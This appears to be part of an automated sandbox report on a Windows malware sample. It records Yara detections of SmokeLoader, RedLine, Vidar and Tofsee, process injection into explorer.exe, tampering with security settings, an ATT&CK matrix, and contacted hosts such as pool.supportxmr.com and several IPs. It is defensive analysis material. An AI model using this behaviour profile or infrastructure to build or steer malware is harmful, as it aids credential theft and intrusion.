                      Source: 26.0.FD6B.exe.cf0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 26.0.FD6B.exe.cf0000.2.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 26.0.FD6B.exe.cf0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 26.0.FD6B.exe.cf0000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 26.0.FD6B.exe.cf0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 42.0.FD6B.exe.1a0000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 42.0.FD6B.exe.1a0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 42.0.FD6B.exe.1a0000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 42.0.FD6B.exe.1a0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeProcess created: C:\Users\user\Desktop\9ro85QVN0F.exe "C:\Users\user\Desktop\9ro85QVN0F.exe"
                      Source: C:\Users\user\AppData\Roaming\iscgwerProcess created: C:\Users\user\AppData\Roaming\iscgwer C:\Users\user\AppData\Roaming\iscgwer
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeProcess created: C:\Users\user\AppData\Local\Temp\53DC.exe C:\Users\user\AppData\Local\Temp\53DC.exe
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess created: C:\Users\user\AppData\Local\Temp\FD6B.exe C:\Users\user\AppData\Local\Temp\FD6B.exe
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeCode function: 25_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeCode function: 25_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,
                      Source: svchost.exe, 00000005.00000002.603968353.0000024F8A590000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.295106186.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.310569887.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.325380041.00000000011E0000.00000002.00020000.sdmp, 411E.exe, 00000013.00000000.398375265.0000000000CC0000.00000002.00020000.sdmp, 411E.exe, 00000013.00000000.399497404.0000000000CC0000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: explorer.exe, 0000000B.00000000.294942686.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000B.00000000.324899097.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000B.00000000.310179991.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
                      Source: svchost.exe, 00000005.00000002.603968353.0000024F8A590000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.295106186.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.296692205.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.310569887.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.325380041.00000000011E0000.00000002.00020000.sdmp, 411E.exe, 00000013.00000000.398375265.0000000000CC0000.00000002.00020000.sdmp, 411E.exe, 00000013.00000000.399497404.0000000000CC0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: svchost.exe, 00000005.00000002.603968353.0000024F8A590000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.295106186.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.310569887.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.325380041.00000000011E0000.00000002.00020000.sdmp, 411E.exe, 00000013.00000000.398375265.0000000000CC0000.00000002.00020000.sdmp, 411E.exe, 00000013.00000000.399497404.0000000000CC0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: svchost.exe, 00000005.00000002.603968353.0000024F8A590000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.295106186.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.310569887.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.325380041.00000000011E0000.00000002.00020000.sdmp, 411E.exe, 00000013.00000000.398375265.0000000000CC0000.00000002.00020000.sdmp, 411E.exe, 00000013.00000000.399497404.0000000000CC0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: explorer.exe, 0000000B.00000000.300102238.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.318596931.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.331623884.0000000008778000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Temp\411E.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeQueries volume information: C:\Users\user\AppData\Local\Temp\FD6B.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 0_2_00419F6B __vswprintf,_putc,__wrename,_atexit,_malloc,_realloc,_ferror,GetBinaryTypeA,SetCurrentDirectoryA,Process32NextW,InitializeCriticalSection,QueryDosDeviceW,AssignProcessToJobObject,GlobalAddAtomW,DeleteAtom,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointW,GetCompressedFileSizeA,SetNamedPipeHandleState,lstrcpynA,GetProcessVersion,GetConsoleAliasesLengthW,UnregisterWait,GetProcessHandleCount,CancelWaitableTimer,SetFileApisToANSI,CreateIoCompletionPort,FindClose,SetEndOfFile,GetCommMask,LocalLock,OpenMutexA,GetLastError,HeapFree,GetConsoleMode,WriteConsoleOutputCharacterA,GetModuleHandleW,GetConsoleMode,FreeEnvironmentStringsA,GetWriteWatch,GetConsoleAliasExesLengthW,_lopen,FileTimeToLocalFileTime,SetCommState,EnumDateFormatsA,TransactNamedPipe,WriteConsoleInputW,GetConsoleAliasExesLengthA,GetAtomNameW,FreeConsole,FlushConsoleInputBuffer,GetConsoleAliasA,SetConsoleCP,VerSetConditionMask,LockFile,SetSystemTime,SetThreadExecutionState,VerLanguageNameW,lstrcpyA,SetFileShortNameW,GetOverlappedResult,GetPrivateProfileSectionW,FreeEnvironmentStringsW,CreateSemaphoreA,GetLocalTime,EnumTimeFormatsW,FindResourceExW,GetPrivateProfileSectionNamesW,GetOverlappedResult,WaitNamedPipeA,TransmitCommChar,CreateSemaphoreW,GetBinaryTypeW,PeekConsoleInputW,BuildCommDCBW,UnregisterWaitEx,GlobalLock,GetOverlappedResult,GetProcAddress,MoveFileExW,GetThreadContext,ResetEvent,FindActCtxSectionStringA,_memset,SetDefaultCommConfigW,lstrcmpW,HeapUnlock,GetConsoleMode,GetVolumePathNameA,MoveFileW,Process32NextW,GetFileAttributesExA,GetDriveTypeA,TryEnterCriticalSection,GetPrivateProfileStructW,WritePrivateProfileSectionA,GetPrivateProfileSectionW,GetSystemTimeAdjustment,WriteConsoleW,EndUpdateResourceW,FindVolumeMountPointClose,DefineDosDeviceW,InterlockedExchange,SetMailslotInfo,GetTapeParameters,CreateActCtxW,FindCloseChangeNotification,GlobalFindAtomA,TerminateProcess,GetSystemWindowsDirectoryW,GetVersion,SetConsoleMode,ReadFileScatter,lstrcmpA,GetPrivateProfileSectionW,DebugBreak,DeleteVolumeMountPointA,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_0040AD40 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_0040ACA0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeCode function: 25_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 0_2_00419F6B __vswprintf,_putc,__wrename,_atexit,_malloc,_realloc,_ferror,GetBinaryTypeA,SetCurrentDirectoryA,Process32NextW,InitializeCriticalSection,QueryDosDeviceW,AssignProcessToJobObject,GlobalAddAtomW,DeleteAtom,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointW,GetCompressedFileSizeA,SetNamedPipeHandleState,lstrcpynA,GetProcessVersion,GetConsoleAliasesLengthW,UnregisterWait,GetProcessHandleCount,CancelWaitableTimer,SetFileApisToANSI,CreateIoCompletionPort,FindClose,SetEndOfFile,GetCommMask,LocalLock,OpenMutexA,GetLastError,HeapFree,GetConsoleMode,WriteConsoleOutputCharacterA,GetModuleHandleW,GetConsoleMode,FreeEnvironmentStringsA,GetWriteWatch,GetConsoleAliasExesLengthW,_lopen,FileTimeToLocalFileTime,SetCommState,EnumDateFormatsA,TransactNamedPipe,WriteConsoleInputW,GetConsoleAliasExesLengthA,GetAtomNameW,FreeConsole,FlushConsoleInputBuffer,GetConsoleAliasA,SetConsoleCP,VerSetConditionMask,LockFile,SetSystemTime,SetThreadExecutionState,VerLanguageNameW,lstrcpyA,SetFileShortNameW,GetOverlappedResult,GetPrivateProfileSectionW,FreeEnvironmentStringsW,CreateSemaphoreA,GetLocalTime,EnumTimeFormatsW,FindResourceExW,GetPrivateProfileSectionNamesW,GetOverlappedResult,WaitNamedPipeA,TransmitCommChar,CreateSemaphoreW,GetBinaryTypeW,PeekConsoleInputW,BuildCommDCBW,UnregisterWaitEx,GlobalLock,GetOverlappedResult,GetProcAddress,MoveFileExW,GetThreadContext,ResetEvent,FindActCtxSectionStringA,_memset,SetDefaultCommConfigW,lstrcmpW,HeapUnlock,GetConsoleMode,GetVolumePathNameA,MoveFileW,Process32NextW,GetFileAttributesExA,GetDriveTypeA,TryEnterCriticalSection,GetPrivateProfileStructW,WritePrivateProfileSectionA,GetPrivateProfileSectionW,GetSystemTimeAdjustment,WriteConsoleW,EndUpdateResourceW,FindVolumeMountPointClose,DefineDosDeviceW,InterlockedExchange,SetMailslotInfo,GetTapeParameters,CreateActCtxW,FindCloseChangeNotification,GlobalFindAtomA,TerminateProcess,GetSystemWindowsDirectoryW,GetVersion,SetConsoleMode,ReadFileScatter,lstrcmpA,GetPrivateProfileSectionW,DebugBreak,DeleteVolumeMountPointA,

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      barindex
                      Changes security center settings (notifications, updates, antivirus, firewall)Show sources
                      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                      Source: svchost.exe, 00000008.00000002.578114912.000001DFEBA40000.00000004.00000001.sdmpBinary or memory string: (@V%ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: svchost.exe, 00000008.00000002.574956646.000001DFEBA29000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.582634282.000001DFEBB02000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected RedLine StealerShow sources
                      Source: Yara matchFile source: 26.2.FD6B.exe.436ba90.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.FD6B.exe.422f910.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.FD6B.exe.436ba90.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.FD6B.exe.422f910.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001A.00000002.474578999.0000000004111000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.474770371.0000000004281000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected SmokeLoaderShow sources
                      Source: Yara matchFile source: 17.0.iscgwer.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.0.iscgwer.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.0.53DC.exe.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.0.53DC.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.0.iscgwer.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.0.53DC.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.9ro85QVN0F.exe.6315a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.53DC.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.53DC.exe.6315a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.1.9ro85QVN0F.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.1.iscgwer.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.1.53DC.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.9ro85QVN0F.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.iscgwer.5615a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.iscgwer.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.340237120.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000000.326990095.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.420944310.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.420623827.0000000000430000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.340386924.00000000022F1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.395898272.00000000004D1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.395779805.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected Vidar stealerShow sources
                      Source: Yara matchFile source: 00000018.00000002.406836326.0000000000582000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected TofseeShow sources
                      Source: Yara matchFile source: 25.3.F4CF.exe.780000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.F4CF.exe.650e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.F4CF.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.F4CF.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000019.00000002.458534378.0000000000650000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.413183404.0000000000780000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.458185502.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: F4CF.exe PID: 6380, type: MEMORYSTR
                      Source: Yara matchFile source: 00000018.00000002.406836326.0000000000582000.00000004.00000001.sdmp, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected RedLine StealerShow sources
                      Source: Yara matchFile source: 26.2.FD6B.exe.436ba90.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.FD6B.exe.422f910.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.FD6B.exe.436ba90.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.FD6B.exe.422f910.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001A.00000002.474578999.0000000004111000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.474770371.0000000004281000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected SmokeLoaderShow sources
                      Source: Yara matchFile source: 17.0.iscgwer.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.0.iscgwer.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.0.53DC.exe.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.0.53DC.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.0.iscgwer.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.0.53DC.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.9ro85QVN0F.exe.6315a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.53DC.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.53DC.exe.6315a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.1.9ro85QVN0F.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.1.iscgwer.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.1.53DC.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.9ro85QVN0F.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.iscgwer.5615a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.iscgwer.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.340237120.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000000.326990095.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.420944310.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.420623827.0000000000430000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.340386924.00000000022F1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.395898272.00000000004D1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.395779805.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected Vidar stealerShow sources
                      Source: Yara matchFile source: 00000018.00000002.406836326.0000000000582000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected TofseeShow sources
                      Source: Yara matchFile source: 25.3.F4CF.exe.780000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.F4CF.exe.650e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.F4CF.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.F4CF.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000019.00000002.458534378.0000000000650000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.413183404.0000000000780000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.458185502.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: F4CF.exe PID: 6380, type: MEMORYSTR
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeCode function: 25_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts1Windows Management Instrumentation1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools111Input Capture1System Time Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API531Valid Accounts1Valid Accounts1Deobfuscate/Decode Files or Information11LSASS MemoryAccount Discovery1Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsShared Modules1Windows Service3Access Token Manipulation1Obfuscated Files or Information3Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationEncrypted Channel22Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsExploitation for Client Execution1Logon Script (Mac)Windows Service3Software Packing33NTDSSystem Information Discovery227Distributed Component Object ModelInput CaptureScheduled TransferNon-Standard Port1SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCommand and Scripting Interpreter3Network Logon ScriptProcess Injection613Timestomp1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol4Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaService Execution2Rc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSecurity Software Discovery571VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol25Jamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsFile Deletion1DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobMasquerading31Proc FilesystemVirtualization/Sandbox Evasion231Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Valid Accounts1/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Access Token Manipulation1Network SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronVirtualization/Sandbox Evasion231Input CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                      Compromise Software Supply ChainUnix ShellLaunchdLaunchdProcess Injection613KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                      Compromise Hardware Supply ChainVisual BasicScheduled TaskScheduled TaskHidden Files and Directories1GUI Input CaptureDomain GroupsExploitation of Remote ServicesEmail CollectionCommonly Used PortProxyDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 553220 Sample: 9ro85QVN0F.exe Startdate: 14/01/2022 Architecture: WINDOWS Score: 100 73 transfer.sh 2->73 75 pool.supportxmr.com 2->75 77 5 other IPs or domains 2->77 87 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->87 89 Multi AV Scanner detection for domain / URL 2->89 91 Antivirus detection for URL or domain 2->91 93 16 other signatures 2->93 11 9ro85QVN0F.exe 2->11         started        14 iscgwer 2->14         started        16 svchost.exe 2->16         started        18 10 other processes 2->18 signatures3 process4 dnsIp5 121 Contains functionality to inject code into remote processes 11->121 123 Injects a PE file into a foreign processes 11->123 21 9ro85QVN0F.exe 11->21         started        125 Machine Learning detection for dropped file 14->125 24 iscgwer 14->24         started        127 Changes security center settings (notifications, updates, antivirus, firewall) 16->127 26 MpCmdRun.exe 16->26         started        79 192.168.2.1 unknown unknown 18->79 signatures6 process7 signatures8 113 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 21->113 115 Maps a DLL or memory area into another process 21->115 117 Checks if the current machine is a virtual machine (disk enumeration) 21->117 28 explorer.exe 12 21->28 injected 119 Creates a thread in another existing process (thread injection) 24->119 33 conhost.exe 26->33         started        process9 dnsIp10 81 185.233.81.115, 443, 49790 SUPERSERVERSDATACENTERRU Russian Federation 28->81 83 81.163.30.181, 49884, 49892, 49895 IR-RASANAPISHTAZIR Russian Federation 28->83 85 10 other IPs or domains 28->85 65 C:\Users\user\AppData\Roaming\iscgwer, PE32 28->65 dropped 67 C:\Users\user\AppData\Local\Temp\FE11.exe, PE32 28->67 dropped 69 C:\Users\user\AppData\Local\Temp\FD6B.exe, PE32 28->69 dropped 71 12 other malicious files 28->71 dropped 137 System process connects to network (likely due to code injection or exploit) 28->137 139 Benign windows process drops PE files 28->139 141 Deletes itself after installation 28->141 143 Hides that the sample has been downloaded from the Internet (zone.identifier) 28->143 35 E6C4.exe 28->35         started        38 53DC.exe 28->38         started        40 FD6B.exe 3 28->40         started        42 3 other processes 28->42 file11 signatures12 process13 file14 95 Detected unpacking (changes PE section rights) 35->95 97 Detected unpacking (overwrites its own PE header) 35->97 99 Found evasive API chain (may stop execution after checking mutex) 35->99 111 4 other 